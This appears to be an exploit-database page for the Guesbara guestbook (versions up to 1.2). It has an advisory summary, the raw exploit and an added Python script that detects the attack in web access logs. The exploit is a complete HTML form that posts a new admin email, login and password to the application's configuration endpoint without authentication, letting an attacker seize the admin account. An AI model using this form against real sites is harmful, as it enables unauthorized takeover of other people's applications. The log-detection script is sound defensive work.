Vendor: Guesbara
By: Kacper
CVSS: 7.5 (HIGH)
CWE: Change administrative password
Product Name: Guesbara
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: NO
Platforms Tested: Unknown

Guesbara <= 1.2 Change admin login & password exploit by Kacper

The Guesbara application is vulnerable to a flaw that allows attackers to change the administrative password. By exploiting this vulnerability, an attacker can gain administrative access to the affected application, leading to a complete compromise of the application.

Mitigation:

It is recommended to update to a patched version of the Guesbara application or apply any available security fixes provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html>
<title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>
<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>
<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td colspan=2 align=center>
<p> <input type='submit' name='submit' value='Zachowaj'> </p>
<p>by Kacper </p>
<p>for</p>
<p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p>&nbsp;</p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>
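Detection logic for the request the form above sends, added here as an example and not part of the original advisory or of Guesbara's code: it scans web access logs for POSTs to admin/configuration.php with action=saveconfig and separates those whose Referer is the site itself from those with a missing or foreign one. The combined log format, the hostname guestbook.example and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)
SITE_HOST = "guestbook.example"  # assumption: hostname that serves the guestbook


def find_config_saves(lines, site_host=SITE_HOST):
    """Return (ip, timestamp, status, reason) for each POST that saves the admin config."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/admin/configuration.php"):
            continue
        if "saveconfig" not in parse_qs(url.query).get("action", []):
            continue
        # "-" or an empty Referer parses to hostname None.
        ref_host = urlsplit(m["referer"]).hostname
        if ref_host == site_host:
            reason = "same-site referer: confirm an administrator made this change"
        else:
            reason = "missing or foreign referer: form was not served by this site"
        hits.append((m["ip"], m["ts"], int(m["status"]), reason))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /gb/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:05:44 +0000] "POST /gb/admin/configuration.php?action=saveconfig&zapis=ok'
    ' HTTP/1.1" 200 812 "http://guestbook.example/gb/admin/configuration.php" "Mozilla/5.0"',
    '203.0.113.50 - - [01/Jan/2024:11:30:09 +0000] "POST /gb/admin/configuration.php?action=saveconfig&zapis=ok'
    ' HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [01/Jan/2024:11:31:00 +0000] "POST /gb/sign.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_config_saves(SAMPLE):
        print(hit)
```

A Referer header is client-supplied, so a same-site value is a prompt to check with the administrator, not proof the change was legitimate.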